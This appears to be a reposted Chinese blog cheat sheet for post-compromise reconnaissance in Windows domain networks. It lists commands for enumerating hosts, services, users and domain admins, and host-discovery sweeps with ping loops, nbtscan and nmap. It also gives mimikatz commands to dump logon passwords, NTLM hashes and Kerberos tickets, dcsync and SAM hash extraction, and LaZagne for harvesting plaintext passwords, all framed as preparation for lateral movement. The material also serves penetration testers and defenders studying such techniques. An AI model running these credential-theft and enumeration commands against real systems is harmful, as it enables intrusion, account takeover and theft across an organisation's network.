常用命令行收集内网信息
基础信息收集
收集计算机基本信息判断当前电脑的是在内网扮演什么角色
获取计算机的详细信息
| systeminfo #详细信息 |
查看计算机启动服务
| net start #查看启动服务 |
查看计算机进程列表
| tasklist |
查看计算机计划任务
| schtasks #查看计划任务 |
网络信息收集
了解当前服务器的网络接口信息,为判断当前角色,功能,网络架构做准备
判断存在域-dns
| ipconfig /all #判断存在域-dns |
判断是否存在域
| net view /domain 判断是否存在域 |
判断域控
| net time /domain #判断域控 |
查看当前网络开放的端口
| netstat -ano #当前网络端口开放 |
追踪来源地址
| nslookup 域名 |
用户信息收集
了解当前计算机或域环境下的用户及用户组信息,便于后期利用凭据进行测试
| 系统默认常见用户身份: | |
| Domain Admins:域管理员(默认对域控制器有完全控制权) | |
| Domain Computers:域内机器 | |
| Domain Controllers:域控制器 | |
| Domain Guest:域访客,权限低 | |
| Domain Users:域用户 | |
| Enterprise Admins:企业系统管理员用户(默认对域控制器有完全控制权) |
相关用户收集操作命令
查看用户权限
| whoami /all #用户权限 |
查看登入信息
| #登入信息 | |
| net config workstation |
查看本地用户组
| net localgroup #本地用户组 |
查看本机用户
| net user #本机用户 |
获取域内用户信息
| net user /domain #获取域内用户信息 |
获取域内用户组信息
| net group /domain #获取域内用户组信息 |
查看域用户详细信息
| wmic useraccount get /all #涉及域用户详细信息 |
查询域管理员账户
| net group "Domain Admins" /domain #查询域管理员账户 |
查询域管理员用户组
| net group "Enterprise Admins" /domain #查询域管理员用户组 |
查询域控制器
| net group "Domain Controllers" /domain |
凭借信息收集
收集各种密文,明文,口令等,为后续横向渗透做好测试准备
计算机用户哈希HASH,明文获取-mimikatz(win) ,mimipenguin(linux)
工具-mimikatz
安装:https://github.com/gentilkiwi/mimikatz
双击运行
| privilege::debug #获取权限 | |
sekurlsa模块
| sekurlsa::logonpasswords #抓取登入密码 |
| sekurlsa::msv #抓取用户NTLM哈希 | |
| sekurlsa::minidump lsass.dmp #加载dmp文件 | |
| sekurlsa::logonpasswords full #并导出其中的明文密码 |
| sekurlsa::tickets /export #导出lsass.exe进程中所有的票据 |
kerberos模块
| 列出系统中的票据 | |
| kerberos::list | |
| kerberos::tgt | |
| 清除系统中的票据 | |
| kerberos::purge | |
| 导入票据到系统中 | |
| kerberos::ptc 票据路径 |
lsadump模块
| 在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等 | |
| lsadump::dcsync /domain:kevin.com /user:root | |
| (在域控上执行)读取所有域用户的哈希 | |
| lsadump::lsa /patch | |
| 从sam.hive和system.hive文件中获得NTLM Hash | |
| lsadump::sam /sam:sam.hive /system:system.hive | |
| 从本地SAM文件中读取密码哈希 | |
| token::elevate | |
| lsadump::sam |
工具-LaZagen
https://github.com/AlessandroZ/LaZagne
一键抓取目标机器上的所有明文密码
工具-XenArmox
探针主机域控架构服务
为后续横向思路做准备,针对应用,协议等各类攻击手法
探针域控制器名及地址信息
| net time /domain nslookup ping |
探针域内存活主机及地址信息
本机命令探测主机存活
| for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.111.%I | findstr "TTL="" | |
nbtscan-第三方工具
| nbtscan 192.168.3.0/24 |
namp
| nmap -sn 192.168.3.0/24 #ping扫描,即主机发现 |
出处:https://www.cnblogs.com/Breeze777/p/17627326.html
如果,您希望更容易地发现我的新博客,不妨点击一下绿色通道的【关注我】。(●'◡'●)
因为,我的写作热情也离不开您的肯定与支持,感谢您的阅读,我是【Jack_孟】!
本文来自博客园,作者:jack_Meng,转载请注明原文链接:https://www.cnblogs.com/mq0036/p/17628075.html
【免责声明】本文来自源于网络,如涉及版权或侵权问题,请及时联系我们,我们将第一时间删除或更改!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
2020-08-14 Linux系统基本使用
2020-08-14 Windows环境下SQL2019的下载与安装
2020-08-14 源代码管理工具和bug管理系统选择与架设
2020-08-14 杉德卡在线下实体超市使用范围查询
2019-08-14 使用批处理打包C#开发程序
2019-08-14 批处理统计某文件夹中文件的个数
2018-08-14 MQ介绍 & 实例